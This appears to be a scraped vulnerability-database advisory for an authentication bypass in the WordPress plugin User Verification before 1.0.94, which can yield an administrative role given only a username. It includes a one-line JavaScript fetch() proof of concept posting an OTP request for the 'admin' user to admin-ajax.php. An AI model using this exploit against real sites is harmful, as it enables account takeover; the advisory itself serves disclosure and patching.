Lucene search

K
wpvulndbLana CodesWPVDB-ID:1EEE10A8-135F-4B76-8289-C381FF1F51EA
HistoryDec 28, 2022 - 12:00 a.m.

User Verification < 1.0.94 - Authentication Bypass

2022-12-2800:00:00
Lana Codes
wpscan.com
13
authentication bypass
plugin vulnerability
administrative role

EPSS

0.004

Percentile

72.7%

The plugin was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.

PoC

Exploit: fetch(‘http://localhost:10008/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=user_verification_send_otp&user;_login=admin’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

EPSS

0.004

Percentile

72.7%

Related for WPVDB-ID:1EEE10A8-135F-4B76-8289-C381FF1F51EA